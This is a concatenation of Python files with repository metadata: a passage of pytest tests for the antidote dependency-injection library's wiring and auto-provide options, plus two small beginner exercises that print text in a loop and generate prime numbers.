@decorate
class Dummy(cls, **meta_kwargs):
if wiring is not DEFAULT_WIRING and cls is not object:
if wiring is not None:
if wiring_kind == 'Wiring':
__antidote__ = cls.Conf(wiring=wiring)
else:
__antidote__ = cls.Conf().with_wiring(**{
attr: getattr(wiring, attr)
for attr in Wiring.__slots__
})
else:
__antidote__ = cls.Conf(wiring=None)
def __init__(self, a: Provide[A] = None, b: Provide[B] = None):
super().__init__()
self.a = a
self.b = b
def method_AB(self, a: A = None, b: B = None) -> Tuple[A, B]:
return a, b
def method_ab(self, a=None, b=None) -> Tuple[Any, Any]:
return a, b
def method_xyz(self, x=None, y=None, z=None) -> Tuple[Any, Any, Any]:
return x, y, z
def __call__(self) -> FactoryOutput: # for Factory
pass
def get(self): # for Constants
pass
if subclass:
class SubDummy(Dummy):
def __call__(self) -> FactoryOutput2: # for Factory
pass
return SubDummy
else:
return Dummy
return build
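# (builder() returns a factory: given a Wiring -- or DEFAULT_WIRING / None --
#  it produces a Dummy class configured for whichever antidote base class
#  (Service, Factory, Constants) or decorator (@service) is under test; the
#  fixtures below parametrize over those combinations.)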
@pytest.fixture(params=[
pytest.param((builder, service), id="@service"),
*[
pytest.param((builder, c, w), id=f"{c.__name__} - {w}")
for (c, w) in itertools.product([Factory,
Service,
Constants],
['with_wiring', 'Wiring'])
]
])
def class_builder(request):
f, *args = request.param
return f(*args)
@pytest.fixture(params=[
    pytest.param((c, w), id=f"{c.__name__} - {w}")
for (c, w) in itertools.product([Factory,
Service,
Constants],
['with_wiring', 'Wiring'])
])
def subclass_builder(request):
(cls, wiring_kind) = request.param
return builder(cls, wiring_kind, subclass=True)
F = Callable[[Optional[Wiring]], Type[DummyProtocol]]
def test_default(class_builder: F):
dummy = class_builder(DEFAULT_WIRING)()
assert dummy.a is world.get(A)
assert dummy.b is world.get(B)
(a, b) = dummy.method_AB()
assert a is None
assert b is None
def test_no_wiring(class_builder: F):
dummy = class_builder(None)()
assert dummy.a is None
assert dummy.b is None
def test_methods(class_builder: F):
dummy = class_builder(Wiring(methods=('__init__',)))()
assert dummy.a is world.get(A)
assert dummy.b is world.get(B)
(a, b) = dummy.method_AB()
assert a is None
assert b is None
dummy = class_builder(Wiring(methods=('method_AB',),
auto_provide=True))()
assert dummy.a is None
assert dummy.b is None
(a, b) = dummy.method_AB()
assert a is world.get(A)
assert b is world.get(B)
def test_auto_provide(class_builder: F):
# Uses type hints by default
dummy = class_builder(Wiring(methods=('method_AB',)))()
(a, b) = dummy.method_AB()
assert a is None
assert b is None
dummy = class_builder(Wiring(methods=('method_AB',), auto_provide=True))()
(a, b) = dummy.method_AB()
assert a is world.get(A)
assert b is world.get(B)
dummy = class_builder(Wiring(methods=('method_AB',), auto_provide=False))()
(a, b) = dummy.method_AB()
assert a is None
assert b is None
dummy = class_builder(Wiring(methods=('method_AB',), auto_provide=[A]))()
(a, b) = dummy.method_AB()
assert a is world.get(A)
assert b is None
dummy = class_builder(Wiring(methods=('method_AB',),
auto_provide=lambda cls: True))()
(a, b) = dummy.method_AB()
assert a is world.get(A)
assert b is world.get(B)
dummy = class_builder(Wiring(methods=('method_AB',),
auto_provide=lambda cls: issubclass(cls, A)))()
(a, b) = dummy.method_AB()
assert a is world.get(A)
assert b is None
dummy = class_builder(Wiring(methods=('method_AB',),
auto_provide=lambda cls: False))()
(a, b) = dummy.method_AB()
assert a is None
assert b is None
def test_dependencies_dict(class_builder: F):
dummy = class_builder(Wiring(dependencies=dict(),
auto_provide=True))()
assert dummy.a is world.get(A)
assert dummy.b is world.get(B)
(a, b) = dummy.method_AB()
assert a is world.get(A)
assert b is world.get(B)
(a, b) = dummy.method_ab()
assert a is None
assert b is None
dummy = class_builder(Wiring(dependencies=dict(a='x', b='y'),
auto_provide=True))()
assert dummy.a is world.get(A)
assert dummy.b is world.get(B)
(a, b) = dummy.method_AB()
assert a is world.get('x')
assert b is world.get('y')
(a, b) = dummy.method_ab()
assert a is world.get('x')
assert b is world.get('y')
dummy = class_builder(Wiring(dependencies=dict(b='y'),
auto_provide=True))()
assert dummy.a is world.get(A)
assert dummy.b is world.get(B)
(a, b) = dummy.method_AB()
assert a is world.get(A)
assert b is world.get('y')
(a, b) = dummy.method_ab()
assert a is None
assert b is world.get('y')
def test_dependencies_seq(class_builder: F):
dummy = class_builder(Wiring(dependencies=[],
auto_provide=True))()
assert dummy.a is world.get(A)
assert dummy.b is world.get(B)
(a, b) = dummy.method_AB()
assert a is world.get(A)
assert b is world.get(B)
(a, b) = dummy.method_ab()
assert a is None
assert b is None
dummy = class_builder(Wiring(dependencies=[None, None],
auto_provide=True))()
assert dummy.a is world.get(A)
assert dummy.b is world.get(B)
(a, b) = dummy.method_AB()
assert a is world.get(A)
assert b is world.get(B)
(a, b) = dummy.method_ab()
assert a is None
assert b is None
dummy = class_builder(Wiring(dependencies=['x', 'y'],
auto_provide=True))()
assert dummy.a is world.get(A)
assert dummy.b is world.get(B)
(a, b) = dummy.method_AB()
assert a is world.get('x')
assert b is world.get('y')
(a, b) = dummy.method_ab()
assert a is world.get('x')
assert b is world.get('y')
dummy = class_builder(Wiring(dependencies=[None, 'y'],
auto_provide=True))()
assert dummy.a is world.get(A)
assert dummy.b is world.get(B)
(a, b) = dummy.method_AB()
assert a is world.get(A)
assert b is world.get('y')
(a, b) = dummy.method_ab()
assert a is None
assert b is world.get('y')
dummy = class_builder(Wiring(dependencies=['x', None],
auto_provide=True))()
assert dummy.a is world.get(A)
assert dummy.b is world.get(B)
(a, b) = dummy.method_AB()
assert a is world.get('x')
assert b is world.get(B)
(a, b) = dummy.method_ab()
assert a is world.get('x')
assert b is None
def test_dependencies_callable(class_builder: F):
dummy = class_builder(Wiring(dependencies=lambda arg: None,
auto_provide=True))()
assert dummy.a is world.get(A)
assert dummy.b is world.get(B)
(a, b) = dummy.method_AB()
assert a is world.get(A)
assert b is world.get(B)
(a, b) = dummy.method_ab()
assert a is None
assert b is None
dummy = class_builder(Wiring(dependencies=lambda arg: 'x' if arg.name == 'a' else 'y',
auto_provide=True))()
assert dummy.a is world.get(A)
assert dummy.b is world.get(B)
(a, b) = dummy.method_AB()
assert a is world.get('x')
assert b is world.get('y')
(a, b) = dummy.method_ab()
assert a is world.get('x')
assert b is world.get('y')
dummy = class_builder(Wiring(
dependencies=lambda arg: 'x' if arg.name == 'a' else None,
auto_provide=True))()
assert dummy.a is world.get(A)
assert dummy.b is world.get(B)
(a, b) = dummy.method_AB()
assert a is world.get('x')
assert b is world.get(B)
(a, b) = dummy.method_ab()
assert a is world.get('x')
assert b is None
def test_distinct_arguments(class_builder: F):
# Having more arguments in dependencies seq is not an issue for methods having less.
dummy = class_builder(Wiring(methods=('method_AB', 'method_xyz'),
dependencies=['x', None, 'z'],
auto_provide=True))()
(a, b) = dummy.method_AB()
assert a is world.get('x')
assert b is world.get(B)
(x, y, z) = dummy.method_xyz()
assert x is world.get('x')
assert y is None
assert z is world.get('z')
# Unknown argument in the dependencies dict won't raise an error.
dummy = class_builder(Wiring(methods=('method_AB', 'method_xyz'),
dependencies=dict(b='b', y='y'),
auto_provide=True))()
(a, b) = dummy.method_AB()
assert a is world.get(A)
assert b is world.get('b')
(x, y, z) = dummy.method_xyz()
assert x is None
assert y is world.get('y')
assert z is None
# type_hints
dummy = class_builder(Wiring(methods=('method_AB', 'method_xyz'),
auto_provide=[A]))()
(a, b) = dummy.method_AB()
assert a is world.get(A)
assert b is None
(x, y, z) = dummy.method_xyz()
assert x is None
assert y is None
assert z is None
|
[
"rabier.benj@gmail.com"
] |
rabier.benj@gmail.com
|
fc67e11ae0ec8985fac5e9c4474302e3c792647f
|
6774b1ed1b40eb4777cddac01a8846fbb9b49d6f
|
/Stepik/13_function/test.py
|
e67b3c66824ae1faf9dcc3de4955fa43189baffe
|
[] |
no_license
|
Surgeon-76/KaPythoshka
|
b664ed7c8552a01c4c931cbb5842fd9b189f4149
|
faf010e58d2d493ab0e91dc7e99540cb65c26a84
|
refs/heads/main
| 2023-08-28T19:20:21.818633
| 2023-08-09T11:14:51
| 2023-08-09T11:14:51
| 339,171,246
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 115
|
py
|
def print_text(text, num):
while num > 0:
print(text, end='')
num -= 1
print_text('Python', 4)
|
[
"surgeon76@outlook.com"
] |
surgeon76@outlook.com
|
6b244d907047478f01653ac411361939a79e31a0
|
cafb95a9475855c3ddf9d21de24d96d9fbcb4fee
|
/Wk5 Ex genPrimes.py
|
e181e94351f60c70da7f1cc3d200f5d15d4c4a81
|
[] |
no_license
|
kj0y/edX-MITx-6.00.1x
|
3728e95062324092a5fe2d43955e70e0a635a2ba
|
f31fd8736d9d5adc6b2752777f46a8c57dc48d8b
|
refs/heads/master
| 2020-03-23T02:06:16.182107
| 2018-08-05T23:11:59
| 2018-08-05T23:11:59
| 140,955,107
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 461
|
py
|
# -*- coding: utf-8 -*-
"""
Created on Sun Aug 5 14:29:40 2018
@author: kandi
"""
def genPrimes():
primes = []
numerator = 2
last = numerator
while True:
for denom in primes:
if numerator % denom == 0:
numerator += 1
break
else:
primes.append(numerator)
last = numerator
numerator += 1
yield last
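# Usage sketch: genPrimes() yields the primes in increasing order, forever.
#   g = genPrimes()
#   [next(g) for _ in range(5)]   # [2, 3, 5, 7, 11]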
|
[
"noreply@github.com"
] |
kj0y.noreply@github.com
|